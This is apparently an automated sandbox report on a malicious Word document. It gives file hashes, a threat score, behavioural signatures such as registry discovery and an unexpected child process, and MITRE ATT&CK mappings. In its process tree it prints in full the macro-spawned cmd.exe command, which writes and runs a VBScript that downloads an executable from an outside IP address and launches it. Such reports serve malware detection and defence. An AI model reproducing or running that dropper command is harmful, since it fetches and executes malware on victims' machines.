2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3

Analysis

max time kernel
185s
max time network
188s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2022 00:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
Size

35KB
MD5

5dab27a18a2851cf1dcae95662a01906
SHA1

fc7ebf9cbc7e5e794474775b3ca457cacde46d6a
SHA256

2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3
SHA512

f11a17c1b905053073ac651085079cb96c2eec4e7b02661c329cd0241a9d91caab5ab8ad527bba057ffc6b739d3134774c9a7601a80d00cae3c2b1e929d88256
SSDEEP

384:HaQ2RBJwytUXWsIFdzHe60HZ0jpwXzVF:QBaXWFJe15kozVF

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3444	2348	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

cscript.exe

flow pid process

81 3396 cscript.exe

flow	pid	process
81	3396	cscript.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2348 WINWORD.EXE
2348 WINWORD.EXE
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

2348 WINWORD.EXE
2348 WINWORD.EXE
2348 WINWORD.EXE
2348 WINWORD.EXE
2348 WINWORD.EXE
2348 WINWORD.EXE
2348 WINWORD.EXE

pid	process
2348	WINWORD.EXE
2348	WINWORD.EXE

pid	process
2348	WINWORD.EXE
2348	WINWORD.EXE
2348	WINWORD.EXE
2348	WINWORD.EXE
2348	WINWORD.EXE
2348	WINWORD.EXE
2348	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXEcmd.exe

description	pid	process	target process
PID 2348 wrote to memory of 3444	2348	WINWORD.EXE	cmd.exe
PID 2348 wrote to memory of 3444	2348	WINWORD.EXE	cmd.exe
PID 3444 wrote to memory of 3396	3444	cmd.exe	cscript.exe
PID 3444 wrote to memory of 3396	3444	cmd.exe	cscript.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://148.251.87.253/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo .type = 1 >>gyuFYFGuig.vbs & @echo .open>>gyuFYFGuig.vbs & @echo .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\system32\cscript.exe
cscript.exe gyuFYFGuig.vbs
3⤵
- Blocklisted process makes network request
PID:3396

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\gyuFYFGuig.vbs
Filesize
606B

MD5
3911c42e02a3705d35980faec92a4ed1

SHA1
34aa53e0f129c0c0041bfe920c621b8e67c44ae0

SHA256
1097f0919b117a1e3b3a9712bdcca875626d191d006f494acd01d5e2a1b154ed

SHA512
fe062a466ec43509a9e720832d9b9c09e8a37808fb27e96e05dc6d50ab79d599486d73de3c3966fea2d55621d43ed7d8cbdba6c99edf198c6f7091bcafefa867

Download Submit
memory/2348-133-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp

Filesize
64KB

Download
memory/2348-134-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp

Filesize
64KB

Download
memory/2348-135-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp

Filesize
64KB

Download
memory/2348-136-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp

Filesize
64KB

Download
memory/2348-137-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp

Filesize
64KB

Download
memory/2348-138-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmp

Filesize
64KB

Download
memory/2348-139-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmp

Filesize
64KB

Download
memory/3396-141-0x0000000000000000-mapping.dmp

Download
memory/3444-140-0x0000000000000000-mapping.dmp

Download